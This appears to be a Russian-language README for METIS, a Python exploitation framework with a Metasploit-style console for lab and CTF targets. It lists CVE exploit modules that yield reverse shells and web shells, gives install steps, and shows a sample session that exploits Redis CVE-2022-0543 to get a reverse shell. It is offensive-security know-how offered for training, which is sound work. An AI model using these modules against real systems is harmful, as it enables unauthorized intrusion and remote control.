Модульный фреймворк для эксплуатации на Python с консолью в стиле Metasploit, автоматической регистрацией модулей Exploit и Auxiliary, трёхсостоятельными проверками и множеством транспортных механизмов сессий для лабораторных и CTF-целей.
███╗ ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗ ██║ ██║███████╗
██║╚██╔╝██║██╔══╝ ██║ ██║╚════██║
██║ ╚═╝ ██║███████╗ ██║ ██║███████║
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝╚══════╝
Фреймворк для эксплуатации на Python, созданный для обучения. Модульная архитектура, тематизированная консоль, несколько транспортных протоколов для сессий и растущая библиотека модулей CVE.
METIS — это фреймворк для исследований в области безопасности, управляемый сообществом. Цель — создать растущую коллекцию модулей, предоставленных исследователями в области безопасности, разработчиками и широким сообществом.
Есть полезный сканер, вспомогательный модуль, модуль эксплойта или другой инструмент для исследований в области безопасности, которым вы хотели бы поделиться? Добавьте его в METIS и откройте Pull Request.
Все вклады приветствуются при условии, что они соответствуют структуре модулей проекта, стандартам кодирования и правилам авторизованного использования.
Независимо от того, добавляете ли вы новый модуль CVE, улучшаете существующий модуль, исправляете ошибку или создаёте новую функциональность фреймворка, ваш вклад может помочь сделать METIS лучше для всех.
См. Написание модулей ниже для получения информации о создании собственного модуля.
METIS — это модульный фреймворк для C2/эксплуатации, написанный на Python. Он запускает интерактивную консоль в стиле Metasploit, где вы выбираете модули, задаёте параметры, запускаете проверки и получаете сессии на лабораторных целях.
Он предназначен для:
Он не предназначен для:
.py в modules/, и он автоматически зарегистрируетсяExploit (создаёт сессии) и Auxiliary (сканеры, перечислители)check() — каждый модуль может проверить перед атакой (VULNERABLE / SAFE / UNKNOWN)file: с живыми индикаторами прогрессаKEY=VALUE| Модуль | Описание |
|---|---|
auxiliary/scanner/tcp_connect | Многопоточный сканер TCP-портов |
auxiliary/scanner/hikvision_cve_2017_7921 | Обход аутентификации IP-камер Hikvision + перечисление пользователей |
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 | Утечка учётных данных MikroTik WinBox |
auxiliary/scanner/redis_cve_2022_0543 | Детектор побега из песочницы Lua в Redis |
| Модуль | Тип сессии |
|---|---|
exploit/unix/ftp/vsftpd_234_backdoor | Привязочный сокет |
exploit/multi/http/ghost_cms_handlebars_rce | Обратный сокет |
exploit/multi/http/langflow_rce_cve_2026_9198 | Обратный сокет |
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816 | Обратный сокет |
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197 | Обратный сокет |
exploit/multi/http/tomcat_put_rce_cve_2017_12615 | Обратный сокет |
exploit/multi/http/joomla_jce_rce_cve_2026_48907 | HTTP веб-оболочка |
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819 | Отложенный обратный (cron) |
exploit/linux/redis/redis_cve_2022_0543_rce | Обратный сокет |
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933 | Канал Paramiko |
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061 | Сырой telnet-сокет |
Требуется Python 3.10+ и git.
git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
requirements.txt:
pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43
Запуск:
python3 metis.py
metis > show modules
# Module Date Rank Chk Description
-- ------------------------------------------------------------ ---------- --------- --- -----------
1 auxiliary/scanner/hikvision_cve_2017_7921 2017-09-23 normal Yes Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
2 auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 2018-08-01 great Yes MikroTik WinBox Credential Leak (CVE-2018-14847)
...
15 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes vsftpd 2.3.4 Backdoor Command Execution
metis > search redis
# Module Date Rank Chk Description
-- ------ ---- ---- --- -----------
1 auxiliary/scanner/redis_cve_2022_0543 2022-02-18 excellent Yes Redis CVE-2022-0543 Scanner
2 exploit/linux/redis/redis_cve_2022_0543_rce 2022-02-18 excellent Yes Redis CVE-2022-0543 Lua Sandbox Escape RCE
metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>
metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
a3f2b1c4 192.168.56.101:51234 (alive)